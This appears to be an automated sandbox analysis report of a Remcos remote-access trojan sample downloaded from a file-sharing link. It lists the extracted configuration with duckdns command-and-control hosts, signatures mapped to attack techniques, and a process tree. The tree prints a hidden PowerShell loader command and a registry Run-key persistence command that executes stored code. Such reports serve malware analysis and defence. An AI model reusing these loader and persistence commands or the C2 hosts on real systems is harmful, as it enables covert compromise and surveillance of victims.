remcos | hxxps://www[.]sendgb[.]com/src/download_one[.]php?uploadId=XRe6kNMAcgW&sc=b29a7fb0f99e7316d6fef858df464c88&file=DOCUMET7887RAMADA%40%23%24%40%21[.]LZH&private_id=

Analysis

max time kernel
210s
max time network
210s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
16/01/2025, 08:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://www.sendgb.com/src/download_one.php?uploadId=XRe6kNMAcgW&sc=b29a7fb0f99e7316d6fef858df464c88&file=DOCUMET7887RAMADA%40%23%24%40%21.LZH&private_id=

Score

10^/10

remcos sent discovery execution persistence rat

Malware Config

Extracted

Family

remcos

Botnet

Sent

haleleeh8iuoty1.duckdns.org:8347

haleleeh8iuoty1.duckdns.org:37830

haleleeh8iuoty2.duckdns.org:8347

haleleeh8iuoty3.duckdns.org:8347

haleleeh8iuoty4.duckdns.org:8347

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
true
install_flag
false
keylog_crypt
false
keylog_file
kmirtup.dat
keylog_flag
false
keylog_path
%AppData%
mouse_option
false
mutex
aksoetuise-Y9DD4X
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
startup_value
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
5096	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
4232	DOCUMET7887RAMADA@#$@!.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Bemixt = "%Teknologiseringerne% -windowstyle 1 $Graensefunktion=(Get-Item 'HKCU:\\Software\\Genindlggelsen\\').GetValue('Pvc');%Teknologiseringerne% ($Graensefunktion)"	reg.exe

Blocklisted process makes network request 7 IoCs

flow	pid	Process
67	2436	msiexec.exe
69	2436	msiexec.exe
71	2436	msiexec.exe
73	2436	msiexec.exe
76	2436	msiexec.exe
79	2436	msiexec.exe
81	2436	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
66	drive.google.com
67	drive.google.com

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
2436	msiexec.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
5096	powershell.exe
2436	msiexec.exe

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Common Files\deistic.ini	DOCUMET7887RAMADA@#$@!.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\resources\bumpee\Ressourcekrvende.lnk	DOCUMET7887RAMADA@#$@!.exe
File opened for modification	C:\Windows\Fonts\sluttishly\nonfeverish.tin	DOCUMET7887RAMADA@#$@!.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DOCUMET7887RAMADA@#$@!.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe

NSIS installer 2 IoCs

installer

resource	yara_rule
behavioral1/files/0x0009000000023c97-132.dat	nsis_installer_1
behavioral1/files/0x0009000000023c97-132.dat	nsis_installer_2

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings	msedge.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
1268	reg.exe

Suspicious behavior: EnumeratesProcesses 22 IoCs

pid	Process
3364	msedge.exe
3364	msedge.exe
4836	msedge.exe
4836	msedge.exe
1760	identity_helper.exe
1760	identity_helper.exe
1908	msedge.exe
1908	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
5096	powershell.exe
5096	powershell.exe
5096	powershell.exe
5096	powershell.exe
5096	powershell.exe
5096	powershell.exe
5096	powershell.exe
5096	powershell.exe
5096	powershell.exe
5096	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1096	7zG.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
5096	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 16 IoCs

pid	Process
4836	msedge.exe
4836	msedge.exe
4836	msedge.exe
4836	msedge.exe
4836	msedge.exe
4836	msedge.exe
4836	msedge.exe
4836	msedge.exe
4836	msedge.exe
4836	msedge.exe
4836	msedge.exe
4836	msedge.exe
4836	msedge.exe
4836	msedge.exe
4836	msedge.exe
4836	msedge.exe

Suspicious use of AdjustPrivilegeToken 33 IoCs

description	pid	Process
Token: SeRestorePrivilege	1624	7zG.exe
Token: 35	1624	7zG.exe
Token: SeSecurityPrivilege	1624	7zG.exe
Token: SeSecurityPrivilege	1624	7zG.exe
Token: SeRestorePrivilege	1420	7zG.exe
Token: 35	1420	7zG.exe
Token: SeSecurityPrivilege	1420	7zG.exe
Token: SeSecurityPrivilege	1420	7zG.exe
Token: SeDebugPrivilege	5096	powershell.exe
Token: SeIncreaseQuotaPrivilege	5096	powershell.exe
Token: SeSecurityPrivilege	5096	powershell.exe
Token: SeTakeOwnershipPrivilege	5096	powershell.exe
Token: SeLoadDriverPrivilege	5096	powershell.exe
Token: SeSystemProfilePrivilege	5096	powershell.exe
Token: SeSystemtimePrivilege	5096	powershell.exe
Token: SeProfSingleProcessPrivilege	5096	powershell.exe
Token: SeIncBasePriorityPrivilege	5096	powershell.exe
Token: SeCreatePagefilePrivilege	5096	powershell.exe
Token: SeBackupPrivilege	5096	powershell.exe
Token: SeRestorePrivilege	5096	powershell.exe
Token: SeShutdownPrivilege	5096	powershell.exe
Token: SeDebugPrivilege	5096	powershell.exe
Token: SeSystemEnvironmentPrivilege	5096	powershell.exe
Token: SeRemoteShutdownPrivilege	5096	powershell.exe
Token: SeUndockPrivilege	5096	powershell.exe
Token: SeManageVolumePrivilege	5096	powershell.exe
Token: 33	5096	powershell.exe
Token: 34	5096	powershell.exe
Token: 35	5096	powershell.exe
Token: 36	5096	powershell.exe
Token: SeRestorePrivilege	1096	7zG.exe
Token: 35	1096	7zG.exe
Token: SeSecurityPrivilege	1096	7zG.exe

Suspicious use of FindShellTrayWindow 37 IoCs

pid	Process
4836	msedge.exe
4836	msedge.exe
4836	msedge.exe
4836	msedge.exe
4836	msedge.exe
4836	msedge.exe
4836	msedge.exe
4836	msedge.exe
4836	msedge.exe
4836	msedge.exe
4836	msedge.exe
4836	msedge.exe
4836	msedge.exe
4836	msedge.exe
4836	msedge.exe
4836	msedge.exe
4836	msedge.exe
4836	msedge.exe
4836	msedge.exe
4836	msedge.exe
4836	msedge.exe
4836	msedge.exe
4836	msedge.exe
4836	msedge.exe
4836	msedge.exe
4836	msedge.exe
4836	msedge.exe
4836	msedge.exe
4836	msedge.exe
4836	msedge.exe
4836	msedge.exe
4836	msedge.exe
4836	msedge.exe
1624	7zG.exe
1624	7zG.exe
1420	7zG.exe
1096	7zG.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
4836	msedge.exe
4836	msedge.exe
4836	msedge.exe
4836	msedge.exe
4836	msedge.exe
4836	msedge.exe
4836	msedge.exe
4836	msedge.exe
4836	msedge.exe
4836	msedge.exe
4836	msedge.exe
4836	msedge.exe
4836	msedge.exe
4836	msedge.exe
4836	msedge.exe
4836	msedge.exe
4836	msedge.exe
4836	msedge.exe
4836	msedge.exe
4836	msedge.exe
4836	msedge.exe
4836	msedge.exe
4836	msedge.exe
4836	msedge.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
3228	OpenWith.exe
2436	msiexec.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4836 wrote to memory of 752	4836	msedge.exe	83
PID 4836 wrote to memory of 752	4836	msedge.exe	83
PID 4836 wrote to memory of 4656	4836	msedge.exe	84
PID 4836 wrote to memory of 4656	4836	msedge.exe	84
PID 4836 wrote to memory of 4656	4836	msedge.exe	84
PID 4836 wrote to memory of 4656	4836	msedge.exe	84
PID 4836 wrote to memory of 4656	4836	msedge.exe	84
PID 4836 wrote to memory of 4656	4836	msedge.exe	84
PID 4836 wrote to memory of 4656	4836	msedge.exe	84
PID 4836 wrote to memory of 4656	4836	msedge.exe	84
PID 4836 wrote to memory of 4656	4836	msedge.exe	84
PID 4836 wrote to memory of 4656	4836	msedge.exe	84
PID 4836 wrote to memory of 4656	4836	msedge.exe	84
PID 4836 wrote to memory of 4656	4836	msedge.exe	84
PID 4836 wrote to memory of 4656	4836	msedge.exe	84
PID 4836 wrote to memory of 4656	4836	msedge.exe	84
PID 4836 wrote to memory of 4656	4836	msedge.exe	84
PID 4836 wrote to memory of 4656	4836	msedge.exe	84
PID 4836 wrote to memory of 4656	4836	msedge.exe	84
PID 4836 wrote to memory of 4656	4836	msedge.exe	84
PID 4836 wrote to memory of 4656	4836	msedge.exe	84
PID 4836 wrote to memory of 4656	4836	msedge.exe	84
PID 4836 wrote to memory of 4656	4836	msedge.exe	84
PID 4836 wrote to memory of 4656	4836	msedge.exe	84
PID 4836 wrote to memory of 4656	4836	msedge.exe	84
PID 4836 wrote to memory of 4656	4836	msedge.exe	84
PID 4836 wrote to memory of 4656	4836	msedge.exe	84
PID 4836 wrote to memory of 4656	4836	msedge.exe	84
PID 4836 wrote to memory of 4656	4836	msedge.exe	84
PID 4836 wrote to memory of 4656	4836	msedge.exe	84
PID 4836 wrote to memory of 4656	4836	msedge.exe	84
PID 4836 wrote to memory of 4656	4836	msedge.exe	84
PID 4836 wrote to memory of 4656	4836	msedge.exe	84
PID 4836 wrote to memory of 4656	4836	msedge.exe	84
PID 4836 wrote to memory of 4656	4836	msedge.exe	84
PID 4836 wrote to memory of 4656	4836	msedge.exe	84
PID 4836 wrote to memory of 4656	4836	msedge.exe	84
PID 4836 wrote to memory of 4656	4836	msedge.exe	84
PID 4836 wrote to memory of 4656	4836	msedge.exe	84
PID 4836 wrote to memory of 4656	4836	msedge.exe	84
PID 4836 wrote to memory of 4656	4836	msedge.exe	84
PID 4836 wrote to memory of 4656	4836	msedge.exe	84
PID 4836 wrote to memory of 3364	4836	msedge.exe	85
PID 4836 wrote to memory of 3364	4836	msedge.exe	85
PID 4836 wrote to memory of 1872	4836	msedge.exe	86
PID 4836 wrote to memory of 1872	4836	msedge.exe	86
PID 4836 wrote to memory of 1872	4836	msedge.exe	86
PID 4836 wrote to memory of 1872	4836	msedge.exe	86
PID 4836 wrote to memory of 1872	4836	msedge.exe	86
PID 4836 wrote to memory of 1872	4836	msedge.exe	86
PID 4836 wrote to memory of 1872	4836	msedge.exe	86
PID 4836 wrote to memory of 1872	4836	msedge.exe	86
PID 4836 wrote to memory of 1872	4836	msedge.exe	86
PID 4836 wrote to memory of 1872	4836	msedge.exe	86
PID 4836 wrote to memory of 1872	4836	msedge.exe	86
PID 4836 wrote to memory of 1872	4836	msedge.exe	86
PID 4836 wrote to memory of 1872	4836	msedge.exe	86
PID 4836 wrote to memory of 1872	4836	msedge.exe	86
PID 4836 wrote to memory of 1872	4836	msedge.exe	86
PID 4836 wrote to memory of 1872	4836	msedge.exe	86
PID 4836 wrote to memory of 1872	4836	msedge.exe	86
PID 4836 wrote to memory of 1872	4836	msedge.exe	86
PID 4836 wrote to memory of 1872	4836	msedge.exe	86
PID 4836 wrote to memory of 1872	4836	msedge.exe	86

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://www.sendgb.com/src/download_one.php?uploadId=XRe6kNMAcgW&sc=b29a7fb0f99e7316d6fef858df464c88&file=DOCUMET7887RAMADA%40%23%24%40%21.LZH&private_id=
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4836
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff409346f8,0x7fff40934708,0x7fff40934718
  2⤵
  PID:752
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,11774337799414385877,4596397761025772363,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2016 /prefetch:2
  2⤵
  PID:4656
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1996,11774337799414385877,4596397761025772363,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2464 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3364
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1996,11774337799414385877,4596397761025772363,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2764 /prefetch:8
  2⤵
  PID:1872
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,11774337799414385877,4596397761025772363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1
  2⤵
  PID:2256
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,11774337799414385877,4596397761025772363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1
  2⤵
  PID:5076
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1996,11774337799414385877,4596397761025772363,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4980 /prefetch:8
  2⤵
  PID:4412
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1996,11774337799414385877,4596397761025772363,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4980 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1760
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,11774337799414385877,4596397761025772363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5064 /prefetch:1
  2⤵
  PID:2940
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,11774337799414385877,4596397761025772363,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5080 /prefetch:1
  2⤵
  PID:5024
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,11774337799414385877,4596397761025772363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5660 /prefetch:1
  2⤵
  PID:3544
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,11774337799414385877,4596397761025772363,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5704 /prefetch:1
  2⤵
  PID:2732
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1996,11774337799414385877,4596397761025772363,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5540 /prefetch:8
  2⤵
  PID:4384
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,11774337799414385877,4596397761025772363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4816 /prefetch:1
  2⤵
  PID:4632
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1996,11774337799414385877,4596397761025772363,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5620 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1908
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,11774337799414385877,4596397761025772363,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1620 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4392
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,11774337799414385877,4596397761025772363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3972 /prefetch:1
  2⤵
  PID:5028
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,11774337799414385877,4596397761025772363,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2308 /prefetch:1
  2⤵
  PID:2684
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,11774337799414385877,4596397761025772363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6020 /prefetch:1
  2⤵
  PID:2420
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,11774337799414385877,4596397761025772363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=904 /prefetch:1
  2⤵
  PID:2288
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,11774337799414385877,4596397761025772363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5960 /prefetch:1
  2⤵
  PID:412
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,11774337799414385877,4596397761025772363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3976 /prefetch:1
  2⤵
  PID:2488
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,11774337799414385877,4596397761025772363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1948 /prefetch:1
  2⤵
  PID:2972
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,11774337799414385877,4596397761025772363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2576 /prefetch:1
  2⤵
  PID:4652
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,11774337799414385877,4596397761025772363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6260 /prefetch:1
  2⤵
  PID:3552
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1996,11774337799414385877,4596397761025772363,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6484 /prefetch:8
  2⤵
  PID:2068

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2164

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:556

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4184

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\DOCUMET7887RAMADA@#$@!\" -spe -an -ai#7zMap8703:106:7zEvent9655
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1624

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\DOCUMET7887RAMADA@#$@!\DOCUMET7887RAMADA@#$@!\" -spe -an -ai#7zMap22166:152:7zEvent6322
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1420

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\DOCUMET7887RAMADA@#$@!\DOCUMET7887RAMADA@#$@!\dendropogon.txt
1⤵
PID:4252

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3228

C:\Users\Admin\Downloads\DOCUMET7887RAMADA@#$@!\DOCUMET7887RAMADA@#$@!.exe
"C:\Users\Admin\Downloads\DOCUMET7887RAMADA@#$@!\DOCUMET7887RAMADA@#$@!.exe"
1⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:4232
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -windowstyle hidden "$Dynamik=GC -raw 'C:\Users\Admin\AppData\Roaming\Brixvold\reclusely\Krieker213.Fla';$balsal=$Dynamik.SubString(57497,3);.$balsal($Dynamik)"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
  PID:5096
- - C:\Windows\SysWOW64\msiexec.exe
    "C:\Windows\SysWOW64\msiexec.exe"
    3⤵
    - Blocklisted process makes network request
    - Suspicious use of NtCreateThreadExHideFromDebugger
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:2436
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bemixt" /t REG_EXPAND_SZ /d "%Teknologiseringerne% -windowstyle 1 $Graensefunktion=(Get-Item 'HKCU:\Software\Genindlggelsen\').GetValue('Pvc');%Teknologiseringerne% ($Graensefunktion)"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2352
    - - C:\Windows\SysWOW64\reg.exe
        
